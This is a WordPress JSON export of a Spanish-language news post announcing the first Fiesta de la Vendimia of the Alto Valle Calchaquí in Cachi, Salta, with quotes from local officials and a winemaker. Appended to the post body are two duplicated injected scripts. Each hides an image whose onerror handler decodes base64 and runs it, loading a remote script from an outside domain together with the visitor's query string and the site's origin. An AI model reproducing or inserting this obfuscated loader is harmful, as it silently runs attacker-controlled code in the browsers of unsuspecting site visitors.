{"id":2362,"date":"2023-03-16T13:22:29","date_gmt":"2023-03-16T16:22:29","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2362"},"modified":"2025-08-14T00:21:05","modified_gmt":"2025-08-14T03:21:05","slug":"cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2362","title":{"rendered":"<a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui-88520\">Cachi celebrar\u00e1 la primera edici\u00f3n de la vendimia del Alto Valle Calchaqu\u00ed<\/a>"},"content":{"rendered":"\n<h3 class=\"has-cyan-bluish-gray-color has-text-color has-background wp-block-heading\" style=\"background-color:#570c36\"><em>La vendimia iniciar\u00e1 el pr\u00f3ximo s\u00e1bado 25 de marzo en la plaza seca del municipio.<\/em><\/h3>\n\n\n\n<p>Los pr\u00f3ximos 25 y 26 de marzo se realizar\u00e1 en el municipio la primera edici\u00f3n de la Fiesta de la Vendimia, una celebraci\u00f3n que busca valorizar los vinos de gran altura, sus trabajadores, productores y todos aquellos actores involucrados en su creaci\u00f3n.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignleft is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6208-cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6208-cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui.JPG\" alt=\"Cachi celebrar\u00e1 la primera edici\u00f3n de la vendimia del Alto Valle Calchaqu\u00ed\" width=\"-327\" height=\"-218\"\/><\/a><\/figure><\/div>\n\n\n<p>El lanzamiento de esta primera edici\u00f3n fue encabezado por el intendente Am\u00e9rico Liendro, bodegueros locales, los secretarios de Turismo Nadia Loza, del Interior, Javier Diez Villa, y la directora del complejo Explora Salta Isabel Zacca.\u00a0<br><br>\u00abFelicitaciones para todo el equipo del municipio y el sector privado por esta propuesta. Salta es el segundo destino enotur\u00edstico del pa\u00eds y por ese motivo celebramos esto y desde el Gobierno de Salta vamos a seguir apoy\u00e1ndolos con infraestructura que va a fortalecer la ruta del vino generando as\u00ed m\u00e1s turismo y m\u00e1s oportunidades para todos\u00bb, destac\u00f3 la secretaria de turismo.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"alignright is-resized\"><a href=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6209-cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui.JPG\"><img decoding=\"async\" src=\"https:\/\/www.salta.gob.ar\/public\/images\/noticias\/contenidos\/6209-cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui.JPG\" alt=\"Cachi celebrar\u00e1 la primera edici\u00f3n de la vendimia del Alto Valle Calchaqu\u00ed\" width=\"-249\" height=\"-166\"\/><\/a><\/figure><\/div>\n\n\n<p>Por su parte, Am\u00e9rico Liendro agradeci\u00f3 el acompa\u00f1amiento y se\u00f1al\u00f3 que esta acci\u00f3n es resultado de un importante trabajo conjunto con el sector privado.<br><br>\u00abQuiero invitarlos a todos a vivir este evento con nosotros el pr\u00f3ximo s\u00e1bado en la plaza seca del municipio, cabe destacar que el acceso ser\u00e1 libre y gratuito.<br><br>Esta vendimia es todo un desaf\u00edo para nosotros y lo tomamos como una pol\u00edtica de estado que queremos se mantenga en el tiempo\u00bb.<\/p>\n\n\n\n<p>Finalmente, el bodeguero Ricardo Isasmendi destac\u00f3 la iniciativa tomada por el municipio y la sinergia lograda entre los sectores p\u00fablico y privado.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/cachi-celebrara-la-primera-edicion-de-la-vendimia-del-alto-valle-calchaqui-88520\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>La vendimia iniciar\u00e1 el pr\u00f3ximo s\u00e1bado 25 de marzo en la plaza seca del municipio. Los pr\u00f3ximos 25 y 26 de marzo se realizar\u00e1 en el municipio la primera edici\u00f3n de la Fiesta de la Vendimia, una celebraci\u00f3n que busca valorizar los vinos de gran altura, sus trabajadores, productores y todos aquellos actores involucrados en [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2363,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14,24,13],"tags":[],"class_list":{"0":"post-2362","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios","8":"category-bodegas","9":"category-festivales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2362"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2362"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2362\/revisions"}],"predecessor-version":[{"id":7144,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2362\/revisions\/7144"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2363"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2362"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2362"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2362"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}